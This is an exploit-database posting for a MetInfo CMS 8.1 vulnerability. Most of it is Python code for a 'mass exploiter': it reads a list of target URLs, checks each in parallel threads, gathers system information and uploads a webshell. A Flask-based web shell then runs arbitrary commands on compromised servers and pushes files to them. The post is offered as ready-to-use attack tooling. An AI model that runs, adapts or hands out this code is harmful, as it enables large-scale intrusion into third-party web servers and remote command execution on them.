PACKETSTORM 9.8 CRITICAL

📄 MetInfo CMS 8.1 Shell Upload Mass Exploiter_PACKETSTORM:219759

April 24, 2026 invoker category_exploit
9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014...
Visit Original Source

Basic Information

ID PACKETSTORM:219759
Published Apr 24, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : MetInfo CMS 8.1 Mass Exploitation & Web Shell Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.metinfo.cn |
==================================================================================================================================

[+] Summary : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014.

[+] POC :

#!/usr/bin/env python3

import threading
import queue
import json
from concurrent.futures import ThreadPoolExecutor, as_completed


class MetInfoMassExploit:
"""Mass exploitation for multiple targets"""

def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):
self.targets = self.load_targets(targets_file)
self.threads = threads
self.output_file = output_file
self.results = []
self.lock = threading.Lock()
self.exploit_class = exploit_class

def load_targets(self, file_path):
"""Load targets from file"""
targets = []
with open(file_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
targets.append(line)
return targets

def exploit_single(self, target_url):
"""Exploit a single target"""
try:
if not self.exploit_class:
return None

exploit = self.exploit_class(target_url, verbose=False)

if exploit.check_vulnerability():
result = {
'url': target_url,
'vulnerable': True
}

if hasattr(exploit, "get_system_info"):
try:
result['info'] = exploit.get_system_info()
except:
result['info'] = None

if hasattr(exploit, "upload_webshell"):
try:
webshell = exploit.upload_webshell()
if webshell:
result['webshell'] = webshell
except:
pass

self.log_result(result)
return result

else:
self.log_result({'url': target_url, 'vulnerable': False})
return None

except Exception as e:
self.log_result({
'url': target_url,
'vulnerable': False,
'error': str(e)
})
return None

def log_result(self, result):
"""Log result with thread safety"""
with self.lock:
self.results.append(result)

if result.get('vulnerable'):
print(f"[+] VULNERABLE: {result.get('url')}")
if result.get('webshell'):
print(f" Webshell: {result.get('webshell')}")
else:
print(f"[-] Not vulnerable: {result.get('url')}")

def run(self):
"""Run mass exploitation"""
print(f"[*] Loaded {len(self.targets)} targets")
print(f"[*] Using {self.threads} threads")

with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = [
executor.submit(self.exploit_single, url)
for url in self.targets
]

for future in as_completed(futures):
try:
future.result()
except Exception:
pass
if self.output_file:
with open(self.output_file, 'w') as f:
json.dump(self.results, f, indent=2)

print(f"[*] Results saved to {self.output_file}")

vulnerable_count = sum(1 for r in self.results if r.get('vulnerable'))
print(f"\n[*] Summary: {vulnerable_count}/{len(self.targets)} targets vulnerable")
class MetInfoWebShell:
"""Web-based shell interface using Flask"""

def __init__(self, exploit_instance):
self.exploit = exploit_instance
self.app = None

def start(self, host='0.0.0.0', port=8080):
"""Start web shell server"""
try:
from flask import Flask, request, render_template_string
import base64 # FIX: missing import

app = Flask(__name__)

TEMPLATE = '''
<html>
<body>
<h2>MetInfo Web Shell</h2>

<form method="post">
<input type="text" name="cmd">
<input type="submit">
</form>

{% if output %}
<pre>{{ output }}</pre>
{% endif %}
</body>
</html>
'''

@app.route('/', methods=['GET', 'POST'])
def index():
output = ""

if request.method == 'POST':
if 'cmd' in request.form:
cmd = request.form['cmd']
output = self.exploit.execute_command(cmd) or ""

elif 'file' in request.files:
file = request.files['file']
if file and file.filename:
content = file.read()
b64_content = base64.b64encode(content).decode()

remote_path = f"/tmp/{file.filename}"
self.exploit.execute_command(
f"echo '{b64_content}' | base64 -d > {remote_path}"
)
output = f"Uploaded to {remote_path}"

return render_template_string(TEMPLATE, output=output)

self.app = app
print(f"[*] Web shell started at http://{host}:{port}")
app.run(host=host, port=port)

except ImportError:
print("[-] Flask not installed")

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.